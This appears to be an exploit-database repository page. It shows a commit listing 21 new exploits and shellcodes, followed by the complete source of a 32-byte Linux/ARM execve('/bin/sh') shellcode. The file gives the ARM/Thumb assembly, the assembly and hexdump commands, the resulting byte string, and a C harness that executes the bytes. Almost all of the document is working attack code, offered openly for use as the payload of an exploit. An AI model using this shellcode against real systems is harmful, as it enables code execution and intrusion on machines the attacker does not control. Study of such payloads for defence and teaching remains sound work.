444206a6be
21 changes to exploits/shellcodes NASA openVSP 3.16.1 - Denial of Service (PoC) Immunity Debugger 1.85 - Denial of Service (PoC) ipPulse 1.92 - 'TCP Port' Denial of Service (PoC) Fathom 2.4 - Denial Of Service (PoC) Skype Empresarial Office 365 16.0.10730.20053 - 'Dirección de inicio de sesión' Denial of service (PoC) Cisco AnyConnect Secure Mobility Client 4.6.01099 - 'Introducir URL' Denial of Service (PoC) HD Tune Pro 5.70 - Denial of Service (PoC) Drive Power Manager 1.10 - Denial Of Service (PoC) Easy PhotoResQ 1.0 - Denial Of Service (PoC) Trillian 6.1 Build 16 - _Sign In_ Denial of service (PoC) SIPP 3.3 - Stack-Based Buffer Overflow R 3.4.4 - Buffer Overflow (SEH) Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure phpMyAdmin 4.7.x - Cross-Site Request Forgery Episerver 7 patch 4 - XML External Entity Injection Argus Surveillance DVR 4.0.0.0 - Directory Traversal Linux/MIPS64 - execve(/bin/sh) Shellcode (48 bytes) Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (32 Bytes) Linux/x86 - Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode Linux/x86 - IPv6 Reverse TCP Shellcode Generator (94 bytes) Windows/x64 (10) - WoW64 Egghunter Shellcode (50 bytes)
63 lines
No EOL
1.5 KiB
C
63 lines
No EOL
1.5 KiB
C
/*
|
|
Title: Linux/ARM - execve("/bin/sh", ["/bin/sh"], NULL) Shellcode (32 Bytes)
|
|
Date: 2018-08-16
|
|
Tested: armv7l (Raspberry Pi 3 Model B+)
|
|
Author: Ken Kitahara
|
|
|
|
pi@raspberrypi:~ $ uname -a
|
|
Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
|
|
pi@raspberrypi:~ $ lsb_release -a
|
|
No LSB modules are available.
|
|
Distributor ID: Raspbian
|
|
Description: Raspbian GNU/Linux 9.4 (stretch)
|
|
Release: 9.4
|
|
Codename: stretch
|
|
pi@raspberrypi:~ $ cat binsh.s
|
|
.section .text
|
|
.global _start
|
|
|
|
_start:
|
|
.ARM
|
|
add r3, pc, #1
|
|
bx r3
|
|
|
|
.THUMB
|
|
// execve("/bin/sh", ["/bin/sh"], NULL)
|
|
adr r0, spawn
|
|
eor r2, r2, r2
|
|
strb r2, [r0, #7]
|
|
push {r0, r2}
|
|
mov r1, sp
|
|
mov r7, #11
|
|
svc #1
|
|
|
|
// adjust address
|
|
eor r7, r7, r7
|
|
|
|
spawn:
|
|
.ascii "/bin/shA"
|
|
|
|
pi@raspberrypi:~ $ as -o binsh.o binsh.s && ld -N -o binsh binsh.o
|
|
pi@raspberrypi:~ $ objcopy -O binary binsh binsh.bin
|
|
pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' binsh.bin
|
|
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x52\x40\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x7f\x40\x2f\x62\x69\x6e\x2f\x73\x68\x41
|
|
|
|
*/
|
|
|
|
#include<stdio.h>
|
|
#include<string.h>
|
|
|
|
unsigned char sc[] = \
|
|
"\x01\x30\x8f\xe2\x13\xff\x2f\xe1"
|
|
"\x03\xa0\x52\x40\xc2\x71\x05\xb4"
|
|
"\x69\x46\x0b\x27\x01\xdf\x7f\x40"
|
|
"\x2f\x62\x69\x6e\x2f\x73\x68\x41";
|
|
|
|
void main()
|
|
{
|
|
printf("Shellcode Length: %d\n", strlen(sc));
|
|
|
|
int (*ret)() = (int(*)())sc;
|
|
|
|
ret();
|
|
} |